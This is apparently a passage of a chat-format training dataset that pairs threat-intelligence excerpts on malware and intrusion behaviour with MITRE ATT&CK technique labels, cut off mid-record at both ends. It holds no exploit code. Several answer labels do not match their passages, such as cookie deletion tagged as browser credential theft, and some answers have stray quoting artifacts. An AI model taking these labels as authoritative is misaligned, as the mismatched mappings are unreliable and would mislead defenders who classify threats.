- "content": "Figure 26. Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand): Figure 27. The getCommand method The figure below shows the example of two of several possible command codes"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can Base64 encode strings, store downloaded files in reverse byte order, and use the Eazfuscator tool to obfuscate its third stage."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PittyTiger attempts to obtain legitimate credentials during operations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses systeminfo on a victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to delete its Registry key and scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Update the RAT and Keylogger remotely - Set an autostart JavaScript to run on RAT startup - A Domain Generation Algorithm (DGA) for C2 resiliency - If the user has admin permissions, it deletes shadow copies using vssadmin.exe"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as “.CIIp”, “.Cllp” and “.C_L_O_P”. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: “ClopReadMe.txt”, “README_README.txt”, “Cl0pReadMe.txt“ and “READ_ME_!!!.TXT"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals user files from network shared drives with file extensions and keywords that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "manipulated .lnk files to gather user credentials in conjunction with ."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY can delete volume shadow copies on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some of the targeted apps were: Whatsapp YouTube Video Downloader Google Update Instagram Hack Wifi AirDroid WifiHacker Facebook Photoshop SkyTV Hotstar Trump Dash PokemonGo With many more to come"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software', 'T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information about network adapters."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook has checked for the presence of Arabic language in the infected machine's settings."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic for most tools occurs over Port Numbers 53, 80, and 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON can use WMI for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "persistence: Somewhat interestingly, OSX/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically"
- },
- {
- "role": "assistant",
- "content": "T1059.002 - Command and Scripting Interpreter: AppleScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has RSA-encrypted its communication with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use WinRM to execute a payload on a remote host."
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deep Panda has used \"-w hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used several different security software icons to disguise executables."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can collect data from removable media and stage it for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can create directories to store logs and other collected data."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page"
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can send information about the compromised host and upload data to a hardcoded C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37's Freenki malware lists running processes using the Microsoft Windows API."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The `Download3rdStage` will first decode `https://discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has enumerated shared folders and mapped volumes."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can use UACMe for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used junk code within their DLL files to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros.', 'T1587.001 - Malware', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has used the \"NetUserEnum\" function to enumerate local accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command Description 0x31 Fingerprint System via WMI and Registry 0x32 Drop File and execute 0x33 Remote Shell 0x34 Terminate connection with C2 0x35 Download and run batch script 0x36 Download file on machine 0x37 Upload File Table 2: FELIXROOT backdoor commands Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla has the ability to encrypt C2 traffic with SSL/TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may use to add local firewall rule exceptions."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet reduces the integrity level of objects to allow write actions."
- },
- {
- "role": "assistant",
- "content": "T1562 - Impair Defenses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dok gives all users execute permissions for the application using the command \"chmod +x /Users/Shared/AppStore.app\"."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The GoldMax Linux variant has used a crontab entry with a \"@reboot\" line to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both variants of the BitPaymer malware feature multiple techniques to hinder analysis. The malware developers have employed a combination of encrypted strings, string hashes and dynamic API resolution to ensure that no strings exist in the binary"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts the message body of HTTP traffic with RC2 (in CBC mode) and Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Other interesting keys include LSMinimumSystemVersion which indicates the (malicious) application is compatible with OSX 10.7 (Lion), and NSUIElement key which tells the OS to execute the application without a dock icon nor menu (i.e"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk has used the \"FindNextFile\" command as part of its file deletion process."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) — obtains passwords from memory gsecdump — obtains passwords from memory winrar — compresses data for exfiltration nbtscan — scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another’s process token just for the execution of a command"
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete used scheduled tasks for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim’s system. According to trusted third-party reporting, communication flows from the victim’s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command Description Action 0 Server response string contains batch commands Execute batch commands and send results back to server 1 Server response string is a file path Check for file path and upload (PUT) the file to server 2 Server response string is a file path Check for file path and download (GET) the file Table 1: POWRUNER commands After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to collect data from USB devices."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf also uses file and folder names related to legitimate programs often found in Windows environments in order to blend in. Observed folder names include HP, Intel, Adobe, and perflogs and folders are generally created in either the root drive or the Application Data or Program Files folders. File names used in recent attacks include adobe.exe, adobe_sl.exe, intel.exe, and intellog.exe"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence with BITS UBoatRAT achieves persistence by using Microsoft Windows Background Intelligent Transfer Service(BITS). BITS is a service for transferring files between machines. Though the most famous application using the service is Windows Update, other applications or users can take advantage of the component. The tool provides the option, /SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot. After completing the copying the local file, BITS executes the UBoatRAT file configured with /SetNotifyCmdLine at the third line"
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has modified UPX headers after packing files to break unpackers."
- },
- {
- "role": "assistant",
